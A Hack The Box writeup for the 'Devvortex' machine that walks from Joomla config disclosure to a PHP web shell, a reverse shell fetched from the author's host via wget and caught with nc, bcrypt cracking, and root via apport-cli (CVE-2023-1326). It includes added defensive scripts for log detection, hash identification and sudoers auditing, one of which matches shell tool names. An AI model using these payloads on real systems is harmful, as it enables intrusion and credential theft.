Devvortex HTB Writeup
Hello Hackers,
This is my first ever blog, though this is not my first ever #hackthebox machine. I had solved 13 boxes on my own when writing this.
And I don’t know why, but I like to solve Linux machines a lot.
So today I’ll be sharing my experience of the box called #devvortex.
Let’s Get Started …..
After setting up the vpn and ip of the box in /etc/hosts, we’re ready to hack the box.
To add the IP to /etc/hosts, I use the echo command.
sudo sh -c 'echo "10.10.11.242 devvortex.htb" >> /etc/hosts'
The first thing I do while solving an HTB machine is to use nmap to scan the open ports of the box.
sudo nmap -sVCS 10.10.11.242
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-20 14:12 IST
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DevVortex
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.76 seconds
The SSH port was running, and there is port 80 for the web application.
There was nothing more interesting in the nmap result, so I thought of finding the subdomains of the target devvortex.htb.
For finding the subdomains of HTB machines, I mostly use the gobuster tool. Using that, I bruteforce the subdomains with a wordlist.
gobuster vhost -u devvortex.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
After adding the subdomain to /etc/hosts, we’re ready to see the page.
To add the subdomain to /etc/hosts, you can use vim and add it after devvortex.htb on the same line (the vhost gobuster found was dev.devvortex.htb).
It should look something like this:
10.10.11.242 devvortex.htb dev.devvortex.htb
This was the page.
After exploring the application and looking through the JavaScript files, I hadn’t found anything. So, as usual, I bruteforced the paths using dirsearch, because after solving so many HTB boxes I noticed that the best crawling tool for HTB is dirsearch.
dirsearch -u http://dev.devvortex.htb/
I found an admin panel path and noticed that it was running the Joomla panel, so I searched for it on Google.
According to google,
“ Joomla, also styled Joomla! and sometimes abbreviated as J!, is a free and open-source content management system for publishing web content on websites. Web content applications include discussion forums, photo galleries, e-Commerce and user communities, and numerous other web-based applications.”
So I searched for joomla exploit on Google and found:
Now, it’s time to search for the version.
So, I was going through all the files that I had found using dirbuster. There I saw a file named /language/en-GB/langmetadata.xml
http://dev.devvortex.htb/language/en-GB/langmetadata.xml
So I got the version and found that it was vulnerable to code execution and some information disclosure.
So I added the path after my base URL, and it was:
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
Now, after going to the administrator panel, I logged in using the username and password.
So, after logging in, I went to System > Site Templates.
In Site Templates I found there was one template.
After going inside I found a bunch of PHP files.
So after adding system($_GET['cmd']); inside the error.php file,
I called the file from the URL and used the parameter to run the command.
http://dev.devvortex.htb/templates/cassiopeia/error.php?cmd=ls
So I started my python server from the folder that contains the rce.php file. Mostly I use Pentest-Monkey RCE script.
python3 -m http.server
So, now it’s time to wget my rce.php file to the server.
So I used wget -u http://my_ip:8000/rce.php
So the command URL I hit was:
http://dev.devvortex.htb/templates/cassiopeia/error.php?cmd=wget -u http://my_ip:8000/rce.php
Now my file was successfully uploaded to the server.
Now I started the nc listener on my machine using:
nc -lvnp 4545 #port number should be same as what you set in the rce.php file
After hitting the url of my rce.php file, I got a reverse shell.
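From the defender’s side, the chain up to this point leaves a clear trail in the nginx access log: a hit on the Joomla config API, then direct calls to a template PHP file with a cmd parameter, then a download tool name inside the query string. The following Python script is an added example (not from this writeup, Joomla or nginx) that flags those three patterns over a few constructed log lines; the client IPs, timestamps and combined log format are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed nginx access-log lines (not taken from the box). The first three
# mirror the requests described in the writeup; the last two are ordinary traffic.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Apr/2024:14:30:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1843 "-" "curl/8.5.0"
10.10.14.5 - - [20/Apr/2024:14:41:12 +0000] "GET /templates/cassiopeia/error.php?cmd=ls HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Apr/2024:14:42:03 +0000] "GET /templates/cassiopeia/error.php?cmd=wget%20-u%20http://10.10.14.5:8000/rce.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.20 - - [20/Apr/2024:14:43:00 +0000] "GET /index.php?option=com_content&view=article&id=2 HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
192.168.1.21 - - [20/Apr/2024:14:43:30 +0000] "GET /administrator/index.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

# Combined-format access log: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator 1: the Joomla API endpoint that returned the configuration in the writeup.
CONFIG_API = "/api/index.php/v1/config/application"
# Indicator 2: a PHP file under /templates/ requested directly with a query string.
TEMPLATE_PHP = re.compile(r"^/templates/[^/]+/[^?]+\.php\?")
# Indicator 3: download or shell tool names appearing inside a query string.
SHELL_TOKENS = re.compile(r"(?:^|[\s;&|=])(?:wget|curl|nc|bash|sh|python3?)\b")


def classify(line):
    """Parse one log line and return a record with the indicators it matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))      # decode %20 etc. before matching
    path, _, query = target.partition("?")
    reasons = []
    if path == CONFIG_API:
        reasons.append("joomla-config-api")
    if TEMPLATE_PHP.match(target):
        reasons.append("template-php-with-query")
    if query and SHELL_TOKENS.search(query):
        reasons.append("shell-token-in-query")
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "target": target,
        "status": int(m.group("status")),
        "reasons": reasons,
    }


def find_suspicious(log_text):
    """Return only the records that matched at least one indicator."""
    return [r for r in map(classify, log_text.splitlines()) if r and r["reasons"]]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], ",".join(hit["reasons"]), hit["target"])
```

The config API indicator on its own is the earliest and cheapest signal: that endpoint has no business being called from the public internet, so a single 200 on it is worth an alert regardless of what follows.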
To make the shell more interactive I used these commands.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
When I get a reverse shell, I usually run the script named linpeas.sh on the server, which shows us all the information about the machine.
So, after running that script in the shell, I noticed that the MySQL port was listening on localhost. So I immediately ran the following command:
mysql -u lewis -p #I have used the password that we found.
After entering the password that we found, we got access to the database. After exploring a bit, I found the users with their hashed passwords.
After getting the hashed passwords, I used an online hash analyzer to find out the type of the hash.
https://www.tunnelsup.com/hash-analyzer/
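The online analyzer is doing nothing more than matching the hash against known shapes: the crypt(3) prefix ($2y$, $6$, $1$, ...) or, for bare hex digests, the length. The Python below is an added example (not the writeup’s tool and not the site above) that does the same offline and also pulls the bcrypt cost factor out, which is the number that decides how expensive each guess in a wordlist attack is. The sample hash strings are constructed: the bcrypt one only has the right shape and is not the hash of anything, and the hex one is the well-known MD5 of the word "password".

```python
import re

# Constructed sample strings for the demo (not from the box's database).
SAMPLE_HASHES = [
    "$2y$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0",  # bcrypt shape, cost 10
    "5f4dcc3b5aa765d61d8327deb882cf99",                             # MD5("password")
    "not-a-hash",
]

# (label, regex, john --format name). crypt(3)-style hashes are identified by
# prefix; bare hex digests only by length, so 32 hex chars stays ambiguous
# between MD5 and NTLM and is reported as such.
PATTERNS = [
    ("bcrypt",      re.compile(r"^\$2[aby]\$(?P<cost>\d{2})\$[./A-Za-z0-9]{53}$"), "bcrypt"),
    ("sha512crypt", re.compile(r"^\$6\$(?:rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{86}$"), "sha512crypt"),
    ("sha256crypt", re.compile(r"^\$5\$(?:rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{43}$"), "sha256crypt"),
    ("md5crypt",    re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$"), "md5crypt"),
    ("md5-or-ntlm", re.compile(r"^[0-9a-fA-F]{32}$"), "raw-md5 or nt"),
    ("sha1",        re.compile(r"^[0-9a-fA-F]{40}$"), "raw-sha1"),
    ("sha256",      re.compile(r"^[0-9a-fA-F]{64}$"), "raw-sha256"),
]


def identify_hash(h):
    """Return (label, details) for one hash string; details carries the john format
    name and, for bcrypt, the cost factor (each guess costs 2**cost rounds)."""
    h = h.strip()
    for label, rx, john_fmt in PATTERNS:
        m = rx.match(h)
        if m:
            details = {"john_format": john_fmt}
            if label == "bcrypt":
                details["cost"] = int(m.group("cost"))
            return label, details
    return "unknown", {}


def summarize(hashes):
    """Count hashes per identified label, to see what a dump is mostly made of."""
    counts = {}
    for h in hashes:
        label, _ = identify_hash(h)
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for h in SAMPLE_HASHES:
        print(h, "->", identify_hash(h))
    print(summarize(SAMPLE_HASHES))
```

The lesson for whoever owns the database is that bcrypt at cost 10 did not save the account here: a password that appears in rockyou.txt falls to a wordlist run whatever the hash, so the control that matters is the password policy, with the cost factor only slowing the attacker down.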
Mostly, I use the john tool for cracking passwords; I also like hashcat.
So to crack the bcrypt password I used the rockyou.txt file.
Before moving forward, I put both of the hashes in a file called hashes.txt. Then I used the following john command to crack them.
john --format=bcrypt --wordlist=/rockyou.txt hashes.txt
Now I signed in over the SSH port with the cracked password and the user found in the database.
ssh logan@devvortex.htb
Then I cat user.txt.
After checking what the user can run as root using:
sudo -l
We got that the user can run apport-cli as root.
After searching for apport-cli privilege escalation on Google, we found CVE-2023-1326.
Then I entered !/bin/bash and got the root shell.
Got the root Shell.
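The root step is a sudoers problem as much as an apport problem: a rule that lets an ordinary user run apport-cli as root hands them the pager that CVE-2023-1326 escapes from. Below is an added example (my own, not part of the writeup or of apport) that audits a sudoers fragment for exactly that rule shape, plus the two generic smells that usually sit next to it, NOPASSWD and an unrestricted ALL. The sudoers text, usernames and paths are constructed for the demo, not the box’s real configuration.

```python
import os
import re

# Constructed sudoers fragment (hypothetical; not the box's real /etc/sudoers).
SAMPLE_SUDOERS = """\
# /etc/sudoers.d/ops (constructed example)
Defaults    env_reset
root    ALL=(ALL:ALL) ALL
logan   ALL=(ALL) NOPASSWD: /usr/bin/apport-cli
deploy  ALL=(ALL) /usr/bin/systemctl restart nginx
alice   ALL=(ALL:ALL) ALL
"""

# Shape of a user rule:  user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# Binaries that drop the caller into an interactive pager when run as root;
# apport-cli is the one this writeup abuses (CVE-2023-1326).
PAGER_BINARIES = {"apport-cli"}


def audit_sudoers(text):
    """Return a list of {user, cmds, issues} for rules that deserve a second look."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m.group("user") == "root":   # root's own rule is expected
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        issues = []
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if cmd == "ALL":
                issues.append("unrestricted (ALL)")
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in PAGER_BINARIES:
                issues.append(f"{binary} as root (CVE-2023-1326)")
        if "NOPASSWD" in tags:
            issues.append("NOPASSWD")
        if issues:
            findings.append({"user": m.group("user"), "cmds": m.group("cmds"), "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']:8} {f['cmds']:40} {'; '.join(f['issues'])}")
```

A hit on the apport-cli line means either patching apport or dropping the rule; the check is deliberately narrow to the binary this box used, and a real audit would extend PAGER_BINARIES with whatever other pager-spawning tools your own sudoers files grant.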
This was my first ever blog, I hope you liked that…